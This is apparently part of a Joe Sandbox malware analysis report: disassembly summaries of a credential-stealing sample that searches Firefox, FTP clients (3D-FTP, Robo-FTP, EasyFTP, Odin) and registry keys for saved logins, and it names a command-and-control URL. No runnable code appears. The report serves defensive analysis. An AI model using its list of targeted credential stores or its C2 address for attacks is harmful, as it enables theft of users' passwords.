                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                • API String ID: 3062143572-2631691096
                                                • Opcode ID: a420107a800d0aea51a075b963a93382334ae6b81802228017219b53d24ef18a
                                                • Instruction ID: 39da728a8dd772fc012492a8606a957950a412be68946470c2c3b1256df5a601
                                                • Opcode Fuzzy Hash: a420107a800d0aea51a075b963a93382334ae6b81802228017219b53d24ef18a
                                                • Instruction Fuzzy Hash: E3F01D70780208BACB11AF61CC47FCD7A659B10748F618066BA08750E3DAB9DAD09B4D
                                                APIs
                                                • StrStrIA.SHLWAPI(0084DAA8,3D-FTP), ref: 0040C8AB
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                                  • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                  • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                                                • API String ID: 1884169789-4074339522
                                                • Opcode ID: c8b0f8b757ce26d72b0da341d4946173f45a57fc4635effd9c8d4719e86838c4
                                                • Instruction ID: 3ed0a44d9d727cfda3b189301b3541e70d32bec96f8b0253371e2d977f848347
                                                • Opcode Fuzzy Hash: c8b0f8b757ce26d72b0da341d4946173f45a57fc4635effd9c8d4719e86838c4
                                                • Instruction Fuzzy Hash: 63119470680201B9FB2137718C86FBE295A5B80758F50863BB924F51E6DABCDE81926C
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AD18
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AD4C
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AE34
                                                  • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAD5
                                                  • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAE8
                                                  • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAFB
                                                  • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB0E
                                                  • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB21
                                                  • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB34
                                                  • Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB47
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$CloseEnumOpen
                                                • String ID: SiteServers
                                                • API String ID: 1693054222-2402683488
                                                • Opcode ID: 16afd5074d53212dab4078331545ebc678f267d3bd3860d33af0478d1fbc4d8b
                                                • Instruction ID: 1594223e70be582826d3cd72c9e653209158aad9ce7b8d71cc8a136c09d12af5
                                                • Opcode Fuzzy Hash: 16afd5074d53212dab4078331545ebc678f267d3bd3860d33af0478d1fbc4d8b
                                                • Instruction Fuzzy Hash: 8231EE31C0021CEADF21AB50CD42BDDB6BABF04305F54C1B6B148711A1CB795F92AF9A
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 004017CD
                                                • GlobalLock.KERNEL32(?), ref: 004017E8
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • GlobalUnlock.KERNEL32(?), ref: 00401846
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 00401855
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                                • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                                • API String ID: 1329788818-258907703
                                                • Opcode ID: e27496e4e278894c0b3e5b7b39f84aede61374fdaa4238e772ed75dd8da7f228
                                                • Instruction ID: be41527f65bf325794da2c557c45d76ae318438bbd6ce9b0a91f8e97d3889ae7
                                                • Opcode Fuzzy Hash: e27496e4e278894c0b3e5b7b39f84aede61374fdaa4238e772ed75dd8da7f228
                                                • Instruction Fuzzy Hash: 0321CDB2D00109BBDF017FA1CC42AAD7E75EF14344F10817ABA14B51B1E77A9B619B98
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408B9F
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: MRU
                                                • API String ID: 1332880857-344939820
                                                • Opcode ID: 022f83d8a6890e340b05324591a2bc82ad8fc555889ed682fd12a25f305b928e
                                                • Instruction ID: e378fe83f72561d05cfb7ba527c10ba2c43f762826e40f39a0f57b05cc83cf8b
                                                • Opcode Fuzzy Hash: 022f83d8a6890e340b05324591a2bc82ad8fc555889ed682fd12a25f305b928e
                                                • Instruction Fuzzy Hash: DF212C7180010CBADF21AF51CD42FDD7BBABF00304F1085BAB544B51A1DBB95B919F99
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401B19
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B34
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401B6A
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID:
                                                • API String ID: 1586453840-0
                                                • Opcode ID: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
                                                • Instruction ID: 4dafb1f052c8dde12143e590320f2d7fd46cce7fa02554cd8ebf7238d74450ed
                                                • Opcode Fuzzy Hash: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
                                                • Instruction Fuzzy Hash: 46214B31A00109EEDF119E94CD82FEF7BB9EB81358F104176F900A61B0E778AA91DB59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "password" : "
                                                • API String ID: 0-2310853927
                                                • Opcode ID: c8fa2ec8a3e59c54122be54d69145ff3b9444bd83a5b570016119b1df7d94bfa
                                                • Instruction ID: 6fab804b68c5b12f2ad2aa84cd87e6c6c7010ce87f2ebf3d142809ba573f1ed0
                                                • Opcode Fuzzy Hash: c8fa2ec8a3e59c54122be54d69145ff3b9444bd83a5b570016119b1df7d94bfa
                                                • Instruction Fuzzy Hash: E721BB32800209BECF11ABA1CC02DEF7E66AF50344F214537F806B51A1E6394EA1E7E9
                                                APIs
                                                • wsprintfA.USER32 ref: 0040D140
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocalwsprintf
                                                • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                                • API String ID: 988369812-376751567
                                                • Opcode ID: ed83a99d3c96ef1c00418dac7fe79ce2922a5a3acc90d94c9a00f3b91135bd3a
                                                • Instruction ID: 4381d0feb127fee54f3a84f3af93957ec257e30dc424e4290f97af7815e85e35
                                                • Opcode Fuzzy Hash: ed83a99d3c96ef1c00418dac7fe79ce2922a5a3acc90d94c9a00f3b91135bd3a
                                                • Instruction Fuzzy Hash: A3012C71D00109BADF11BAD1CC82EEE7A79AF00304F9085B7B810B51E1DBBD9B999A59
                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401226
                                                • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040124A
                                                • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401256
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleRead
                                                • String ID:
                                                • API String ID: 1035965006-0
                                                • Opcode ID: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
                                                • Instruction ID: aed9a798a82424e29e86fb4d6860d5487fec7a9f4572c56382ed939f2aa806a9
                                                • Opcode Fuzzy Hash: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
                                                • Instruction Fuzzy Hash: 08F0F931A4010CBAEF22AB61DC02FDDBA79AB24749F1080A6B554F40E0D7B99BD99B14
                                                APIs
                                                • lstrlenA.KERNEL32(?), ref: 00401CB4
                                                • lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                                • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                                • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID:
                                                • API String ID: 2414487701-0
                                                • Opcode ID: 6a6bb444d751dc1b0010ae33392c2bbbe9a965a8df87d9ba58856e5dde5492e4
                                                • Instruction ID: 866bfbedeafafde08c2bee9fe9cbb11584a7d4ec80a94fa2542d90e961c12a7e
                                                • Opcode Fuzzy Hash: 6a6bb444d751dc1b0010ae33392c2bbbe9a965a8df87d9ba58856e5dde5492e4
                                                • Instruction Fuzzy Hash: 2AF0177150020CBBEF016F61CC81ADE3A58AB503ACF00C12ABC1958262D7BDCAC4AB98
                                                APIs
                                                • lstrlenA.KERNEL32(?), ref: 00401C60
                                                • lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID:
                                                • API String ID: 2414487701-0
                                                • Opcode ID: 9a0f3187f51665ea0ac82ef3bf2c39c32ff20c50b64f94c96ea9f74d2850344c
                                                • Instruction ID: 2ccc96f8f4a00b18c61e96875fe2ff250938ad2f4b26475bf95d09c4eb0a8a34
                                                • Opcode Fuzzy Hash: 9a0f3187f51665ea0ac82ef3bf2c39c32ff20c50b64f94c96ea9f74d2850344c
                                                • Instruction Fuzzy Hash: 7CF0AC7154030CBBDF017F61CC81A9E3A58AB1536CF00D52AB92A59262D7BDCAD49B98
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401D23
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401D58
                                                • RLA, xrefs: 00401D3C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocFolderLocalPath
                                                • String ID: RLA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 1254228173-1568935434
                                                • Opcode ID: a508656fb7d6c21292a83b02f990a3b04465742859524da43eef899cc6c940a9
                                                • Instruction ID: 08f3cabee50476261f007a3996d69b32631a763a3fa92a32f6b4e4254e47f6ee
                                                • Opcode Fuzzy Hash: a508656fb7d6c21292a83b02f990a3b04465742859524da43eef899cc6c940a9
                                                • Instruction Fuzzy Hash: BA017132A00605FBDB209BA0DD01F9AB7A5AF40754F248177F115BA2E0E778AA40DB99
                                                APIs
                                                  • Part of subcall function 00403E3C: WSAStartup.WSOCK32(00000101,?), ref: 00403E51
                                                • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FB9A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SleepStartup
                                                • String ID: Client Hash$http://6.magicalomaha.co/forum/viewtopic.php
                                                • API String ID: 1372284471-71643543
                                                • Opcode ID: e5c4103a3b1c4370ac9b790015c18acca5626cd5fbe554ede3e0c1e2e77852e5
                                                • Instruction ID: bd969abef3c94c19d149e5ad6d2df461307f3594a610c58dfbd981d64c0cc690
                                                • Opcode Fuzzy Hash: e5c4103a3b1c4370ac9b790015c18acca5626cd5fbe554ede3e0c1e2e77852e5
                                                • Instruction Fuzzy Hash: 1721E03190024A9ADF31ABD1C955BFF76B8AB40349F64003BE240719D1D7BC6A8DDF6A
                                                APIs
                                                • StrStrIA.SHLWAPI(00849868,Odin), ref: 00409F2E
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocal
                                                • String ID: Odin$SiteInfo.QFP
                                                • API String ID: 2826327444-4277389770
                                                • Opcode ID: d89bb5812699bbab7ff915cd692d3dab3779f20f334e3563dbb6d7bbc46ba9fc
                                                • Instruction ID: 2bd66190c2b6516a536f6296de54229ce0ad04f38d011e686685beed88ee443e
                                                • Opcode Fuzzy Hash: d89bb5812699bbab7ff915cd692d3dab3779f20f334e3563dbb6d7bbc46ba9fc
                                                • Instruction Fuzzy Hash: 3A01D270A041057AEB2137218C02FAE3E599F81354F24407BBA08F51E3DABC9E8187AC
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040741F
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407453
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID:
                                                • API String ID: 4012628704-0
                                                • Opcode ID: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
                                                • Instruction ID: 155f66e0a3eb4ed45e6c31c6170a54985ca42cf8ad1f2557258d09283c9eb503
                                                • Opcode Fuzzy Hash: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
                                                • Instruction Fuzzy Hash: 4C111C3180010CBADF21AF90CC41BDEBBB9BF04304F1081B6B614B41A1DBB9AB959F99
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F1EA
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F21E
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F278
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID:
                                                • API String ID: 1332880857-0
                                                • Opcode ID: bba7855a52f87d8d52e8a5e88adb8c8ca694f631aba0f96df78014c251771091
                                                • Instruction ID: 7017fd83e19b502adcb907764abf0477eb306f287b39071005cb36938cbed895
                                                • Opcode Fuzzy Hash: bba7855a52f87d8d52e8a5e88adb8c8ca694f631aba0f96df78014c251771091
                                                • Instruction Fuzzy Hash: FC113035D0020CBADF21AFA0CC42FEE7B79BF00304F1084BAB514740A1DBB99A95AF58
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 00403650
                                                • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
                                                • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: closesocketconnectsocket
                                                • String ID:
                                                • API String ID: 643388700-0
                                                • Opcode ID: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
                                                • Instruction ID: 0f4e70b3c385995e94c185cadd9b4dcc0b5eff5d6ab24c1b6e743b0ce68c8e52
                                                • Opcode Fuzzy Hash: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
                                                • Instruction Fuzzy Hash: 63018870904208BADB309E65CC81BEE775DAB00329F108E3BB525A53D1D7BE96848E5A
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F14B
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F17B
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F1CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID:
                                                • API String ID: 1332880857-0
                                                • Opcode ID: 940382a54b7a00bc654334baa91ef29c1e97f4576270b3f892e2d1d334684ca6
                                                • Instruction ID: 8e3455aed7961dffbf20232922aa9c977cc65fb5afe4b3b44f93b40fe4c3dbae
                                                • Opcode Fuzzy Hash: 940382a54b7a00bc654334baa91ef29c1e97f4576270b3f892e2d1d334684ca6
                                                • Instruction Fuzzy Hash: F7112A3190410CBADF21AF90CC42BEE7B79BF04304F1084B6B614B41A1DBB99A95AB98
                                                APIs
                                                • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040C9D6
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                                  • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                  • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040C9B8
                                                • EasyFTP, xrefs: 0040C9CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                                • API String ID: 1884169789-2776585315
                                                • Opcode ID: 25aebd4e492a327640deb57bcd3e7bddbf5097bb71dcd0c202626d929b94dc4d
                                                • Instruction ID: 7873a25fe67d61e736d5ba7eb95c8ac146f25758c61c21fddb3f31f6913e4213
                                                • Opcode Fuzzy Hash: 25aebd4e492a327640deb57bcd3e7bddbf5097bb71dcd0c202626d929b94dc4d
